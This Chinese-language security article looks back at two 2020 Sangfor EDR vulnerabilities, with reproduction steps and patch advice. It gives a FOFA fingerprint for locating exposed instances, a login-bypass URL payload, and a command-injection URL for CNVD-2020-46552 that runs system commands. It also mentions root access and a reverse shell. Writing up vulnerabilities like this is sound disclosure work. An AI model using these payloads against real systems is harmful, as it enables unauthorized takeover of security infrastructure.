深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。支持统一化的终端资产管理、终端病毒查杀、终端合规性检查和访问控制策略管理,支持对安全事件的一键隔离处置,以及对热点事件IOC的全网威胁定位。绝大多数的EDR管理平台部署于内网环境中,少数系统可以通过外网地址访问。
NO.1后台任意用户登陆漏洞【详情】攻击者可以通过构造payload绕过登录判断,直接拿到系统管理员/用户权限。漏洞影响版本<=v3.2.19。
【漏洞复现】
1)fofa指纹:title="终端检测响应平台",如图一所示,而后点击进入登录界面(图二)
文章图片
图一
【行业资讯|【HW2020漏洞回顾】深信服EDR两大漏洞】
文章图片
图二
2)Payload:https://ip:xx/ui/login.php?user=任意用户名,如https://ip:xx/ui/login.php?user=admin,回车即可成功登录平台(图三)
文章图片
图三
注:该用户名须存在
NO.2远程命令执行漏洞CNVD-2020-46552【详情】
攻击者可通过构造HTTP请求来利用此漏洞,成功利用此漏洞的攻击者可以在目标主机上执行任意命令。国家信息安全漏洞共享平台(CNVD)已于8月18日收录该漏洞。CNVD对该漏洞的综合评级为“高危,漏洞影响版本v3.2.16-19”。
【漏洞复现】
1)构造Payload,这里漏洞文件是c.php,漏洞参数是host
/tool/log/c.php?strip_slashes=system&host=id
2)root权限(图4)
文章图片
图4
3)反弹shell(图5)
文章图片
图5
【修复建议】官方已发布更新版本和修复补丁,用户只需更新至3.2.21版本或升级补丁可修复该漏洞。
针对深信服EDR系统近期出现的大量漏洞,建议系统使用方运营者及时自查,发现存在漏洞后,按照漏洞处置建议及时进行加固处置。
以上内容由yufei投稿,信安客出品,信安客——打造网络安全高端人才。
